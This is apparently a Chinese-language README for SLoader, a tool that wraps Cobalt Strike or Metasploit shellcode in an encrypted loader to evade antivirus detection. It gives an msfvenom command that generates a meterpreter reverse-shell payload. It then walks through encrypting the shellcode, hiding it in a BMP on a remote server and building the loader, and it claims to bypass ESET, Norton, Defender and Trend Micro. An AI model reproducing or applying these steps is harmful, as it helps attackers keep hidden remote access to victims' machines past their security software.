概要

SLoader 是一個幫助遠端控制工具繞過防毒軟體檢測的工具。

在進行深入攻防滲透時，常常需要植入 Cobalt Strike、Metasploit Framework、sliver 等工具的木馬程序來維持權限，但會被防毒軟體檢測到。Loader 可以協助遠端控制工具繞過 Defender、趨勢科技、Norton、McAfee 等防毒軟體的檢測。

技術實現

自訂擴展：利用模板自訂加載方式，創造新的加載方式。
隨機哈希：隨機生成檔案名稱，並以時間戳作為鍵對 URL 進行加密。
隱秘連結：loader 遠端加密連結 payload。
多重加密：使用 RC4、Base64、AES 演算法進行 payload 的加解密。

編譯環境

編譯環境：生成器、編碼器與加載模板均使用 C++ 開發，通過 Visual Studio 2022 靜態編譯。
編譯方式：通過 Visual Studio 2022 打開解決方案 (*.sln)，選擇 release、x64 進行編譯。或直接下載使用realse。

使用方式

使用 Cobalt Strike 生成 raw 格式的 shellcode 檔案（shellcode 的位元數取決於加載器模板的位元數）,或者可以使用 msfvenom（msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=x -f raw -o beacon.bin）

通過 encode 對 shellcode 進行加密（加密金鑰需要 16 位元組）

將生成的 bmp 檔案上傳至遠端 WEB 伺服器生成下載連結（訪問 URL 可直接下載檔案）
打開生成器，填寫 bmp 檔案的 URL 與加密金鑰，選擇自訂的加載器模板（DATA 目錄）

點選 Generate，桌面上會生成可執行的加載器檔案

實際效果

ESET

Norton （Norton 會攔截沒有簽名的程式上網，因此需要對程式進行簽名）

Defender

Trend Micro (趨勢科技)

![image]

連結：https://github.com/ED-E92/SLoader